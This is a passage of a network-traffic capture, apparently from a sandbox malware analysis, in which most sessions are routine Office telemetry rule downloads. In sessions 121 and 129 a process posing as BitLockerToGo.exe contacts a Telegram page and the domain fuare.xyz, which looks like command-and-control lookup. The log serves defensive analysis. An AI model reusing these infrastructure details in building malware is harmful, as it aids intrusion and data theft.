120 | 192.168.2.5 | 49830 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:42 UTC | 192 | OUT | GET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:42 UTC | 517 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:42 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 6266d644-901e-0083-0e09-2cbb55000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142542Z-16547b76f7fj897nhC1DFWdwq40000000km000000000dbgs
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:42 UTC | 1362 | IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
121 | 192.168.2.5 | 49829 | 149.154.167.99 | 443 | 6152 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:42 UTC | 85 | OUT | GET /m07mbk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Host: t.me
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
2024-11-14 14:25:42 UTC | 511 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:42 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 12292
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: stel_ssid=b303062d2273ada46e_3538011266628302031; expires=Fri, 15 Nov 2024 14:25:42 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                        Cache-control: no-store
                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=35768000
2024-11-14 14:25:42 UTC | 12292 | IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m07mbk</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID | Source IP | Source Port | Destination IP | Destination Port
122 | 192.168.2.5 | 49831 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:42 UTC | 192 | OUT | GET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:42 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:42 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1425
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: d8b0f8ac-001e-005a-47a7-34c3d0000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142542Z-r178fb8d765z89v7hC1DFW0kvw00000002d000000000kadn
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:42 UTC | 1425 | IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


Session ID | Source IP | Source Port | Destination IP | Destination Port
123 | 192.168.2.5 | 49832 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:42 UTC | 192 | OUT | GET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:42 UTC | 517 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:42 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1388
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
ETag: "0x8DC582BDBD9126E"
x-ms-request-id: 9bdc8c39-b01e-003d-1ed2-2cd32c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142542Z-16547b76f7f22sh5hC1DFWyb4w0000000km000000000hdr1
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:42 UTC  1388               IN
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


Session ID  Source IP    Source Port  Destination IP  Destination Port
124         192.168.2.5  49833        13.107.246.45   443

Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:42 UTC  192                OUT        GET /rules/rule702501v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:42 UTC  494                IN         HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:42 GMT
Content-Type: text/xml
Content-Length: 1415
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
ETag: "0x8DC582BE7C66E85"
x-ms-request-id: 9c6e6586-601e-0097-55a1-34f33a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142542Z-1749fc9bdbdlzhmchC1DFWe68s00000002dg00000000gswf
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:42 UTC  1415               IN
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


Session ID  Source IP    Source Port  Destination IP  Destination Port
125         192.168.2.5  49834        13.107.246.45   443

Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:42 UTC  192                OUT        GET /rules/rule702500v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:43 UTC  517                IN         HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:42 GMT
Content-Type: text/xml
Content-Length: 1378
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
ETag: "0x8DC582BDB813B3F"
x-ms-request-id: 71af9553-101e-00a2-14d2-2c9f2e000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142542Z-16547b76f7fnlcwwhC1DFWz6gw0000000ku000000000g9t3
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:43 UTC  1378               IN
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


Session ID  Source IP    Source Port  Destination IP  Destination Port
126         192.168.2.5  49835        13.107.246.45   443

Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:43 UTC  192                OUT        GET /rules/rule700501v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:43 UTC  494                IN         HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:43 GMT
Content-Type: text/xml
Content-Length: 1405
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
ETag: "0x8DC582BE89A8F82"
x-ms-request-id: 2200add1-e01e-0071-45a6-3408e7000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142543Z-r178fb8d765th6bkhC1DFWr7h000000002n000000000nzmq
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:43 UTC  1405               IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


Session ID  Source IP    Source Port  Destination IP  Destination Port
127         192.168.2.5  49837        13.107.246.45   443
Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:43 UTC  192                OUT        GET /rules/rule700500v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:43 UTC  494                IN         HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:43 GMT
Content-Type: text/xml
Content-Length: 1368
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
ETag: "0x8DC582BE51CE7B3"
x-ms-request-id: f826ff35-b01e-00ab-80a6-34dafd000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142543Z-1749fc9bdbdgs9sshC1DFWt6ws00000002vg0000000000n8
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:43 UTC  1368               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


Session ID  Source IP    Source Port  Destination IP  Destination Port
128         192.168.2.5  49838        13.107.246.45   443
Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:43 UTC  192                OUT        GET /rules/rule702551v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:43 UTC  494                IN         HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:43 GMT
Content-Type: text/xml
Content-Length: 1415
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
ETag: "0x8DC582BDCE9703A"
x-ms-request-id: e4621776-701e-0053-5181-353a0a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142543Z-1749fc9bdbdwv5sghC1DFWwp6n00000002d000000000g2d3
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:43 UTC  1415               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
129         192.168.2.5  49836        116.203.0.159   443               6152  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:43 UTC  224                OUT        GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: fuare.xyz
Connection: Keep-Alive
Cache-Control: no-cache
2024-11-14 14:25:44 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Thu, 14 Nov 2024 14:25:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-11-14 14:25:44 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
130 | 192.168.2.5 | 49839 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:43 UTC | 192 | OUT | GET /rules/rule702550v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:43 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:43 GMT
Content-Type: text/xml
Content-Length: 1378
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
ETag: "0x8DC582BE584C214"
x-ms-request-id: 318e9082-a01e-0070-08a8-34573b000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142543Z-1749fc9bdbd4dqj6hC1DFWr4n400000002k000000000hsp4
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:43 UTC | 1378 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
131 | 192.168.2.5 | 49840 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:43 UTC | 192 | OUT | GET /rules/rule701351v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:43 UTC | 494 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:43 GMT
Content-Type: text/xml
Content-Length: 1407
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
ETag: "0x8DC582BE687B46A"
x-ms-request-id: 56b7ef4f-301e-003f-0261-35266f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142543Z-1749fc9bdbdlzhmchC1DFWe68s00000002dg00000000gszw
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:43 UTC | 1407 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


Session ID | Source IP | Source Port | Destination IP | Destination Port
132 | 192.168.2.5 | 49841 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:43 UTC | 192 | OUT | GET /rules/rule701350v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:43 UTC | 538 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:43 GMT
Content-Type: text/xml
Content-Length: 1370
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
ETag: "0x8DC582BDE62E0AB"
x-ms-request-id: 43525779-601e-003e-2ed2-2c3248000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142543Z-16547b76f7f4k79zhC1DFWu9y00000000kt000000000e1yn
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:43 UTC | 1370 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


Session ID | Source IP | Source Port | Destination IP | Destination Port
133 | 192.168.2.5 | 49842 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:44 UTC | 192 | OUT | GET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:44 UTC | 517 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 524ac160-c01e-007a-69d2-2cb877000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142544Z-16547b76f7fkcrm9hC1DFWxdag0000000kx0000000009rmt
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:44 UTC | 1397 | IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


Session ID | Source IP | Source Port | Destination IP | Destination Port
134 | 192.168.2.5 | 49844 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:44 UTC | 192 | OUT | GET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:44 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1406
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 18d5585a-801e-0015-2dfc-35f97f000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142544Z-1749fc9bdbdjjp8thC1DFWye6g00000002h000000000exfr
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:44 UTC | 1406 | IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


Session ID | Source IP | Source Port | Destination IP | Destination Port
135 | 192.168.2.5 | 49846 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:44 UTC | 192 | OUT | GET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:44 UTC | 538 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1414
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE03B051D"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 8ba6fbd3-701e-0032-29d2-2ca540000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142544Z-16547b76f7f775p5hC1DFWzdvn0000000ks000000000bct5
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:44 UTC | 1414 | IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


Session ID | Source IP | Source Port | Destination IP | Destination Port
136 | 192.168.2.5 | 49845 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:44 UTC | 192 | OUT | GET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:44 UTC  517                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1369
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE32FE1A2"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 44d511d9-701e-000d-2909-2c6de3000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142544Z-16547b76f7fk9g8vhC1DFW825400000000kg00000000kd43
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:44 UTC  1369               IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


Session ID  Source IP    Source Port  Destination IP  Destination Port
137         192.168.2.5  49843        13.107.246.45   443
Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:44 UTC  192                OUT        GET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
